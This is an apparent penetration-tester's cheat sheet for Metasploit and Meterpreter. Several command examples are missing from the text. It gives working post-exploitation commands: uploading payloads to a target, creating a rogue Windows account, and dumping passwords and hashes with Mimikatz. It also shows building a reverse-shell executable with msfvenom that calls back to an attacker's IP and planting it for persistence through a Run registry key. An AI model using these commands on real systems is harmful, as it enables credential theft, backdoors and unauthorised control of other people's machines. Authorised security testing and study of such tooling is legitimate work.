Setup the Database

service postgresql start
kali msfdb init

Test it:

You’ll know it worked if you see [*] postgresql connected to msf. Resource: https://docs.kali.org/general-use/starting-metasploit-framework-in-kali

Troubleshooting database connectivity issues

Start by restarting the postgres service:

service postgresql restart

If that doesn’t work, try destroying and recreating the database:

Then test it:

Resource: https://stackoverflow.com/questions/32561760/metasploit-cant-use-default-msf3-to-connect

Meterpreter

Get current user info

View running jobs

Useful if you’re running something with exploit -j -z

Upload file

You could use this in conjunction with an Empire payload for example

upload /tmp/launcher.bat C:\\Users\\target_user\\Downloads

Create rogue user on a windows system

run getgui -u <user to create> -p <password to set>

Resource: https://www.coengoedegebure.com/hacking-windows-with-meterpreter/#anchor_createanewaccount

Mimikatz

To get started, run:

Show commands

Dump all creds:

Run mimikatz command examples

mimikatz_command -f sekurlsa::searchPasswords
mimikatz_command -f sekurlsa::logonPasswords
mimikatz_command -f samdump::hashes

Interact with harvested credentials

List credentials

Delete all smb credentials

Download remote file to current directory

Edit remote file

Resource: https://stackoverflow.com/questions/30642668/metasploit-meterpreter-session-editing-files-with-vi-editor

Run commands on local system

All you need to do is add an “l” before the command you want to run.

Current directory on system running msf:

Run ls:

Change directory:

The file will be in lpwd.

Channels

You can spawn a channel off of a session by hitting ctrl-z.

List:

Interact:

Destroy:

Persistence

Generate a malicious exe (note that the payload you choose may be different):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attackers ip> LPORT=4444 -f exe -o /tmp/evil.exe

Run this in meterpreter:

run post/windows/manage/persistence_exe REXEPATH=/tmp/evil.exe REXENAME=default.exe STARTUP=USER LocalExePath=C:\\tmp

or background meterpreter and use the post module:

use post/windows/manage/persistence_exe
set REXEPATH /tmp/evil.exe
set SESSION <session number>
set STARTUP USER
set LocalExePath C:\\tmp
run

STARTUP can be USER (registry key will be put into HKCU - HKEY_CURRENT_USER), SYSTEM (registry key will be put into HKLM - HKEY_LOCAL_MACHINE), or SERVICE (a rogue service will be created) which doesn’t seem to work very well.

Cleanup:

The cleanup rc file does not work very well. As a result, you should take note of the registry key and associated file that are dropped for cleanup later, and make sure to note which user you’re running as. To remove the registry key (let’s say that USER was specified for the STARTUP value and hFaZvOAsF is the key), run the following command:

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ /v hFaZvOAsF /f

Start in quiet mode

Resource: https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf

Show advanced module options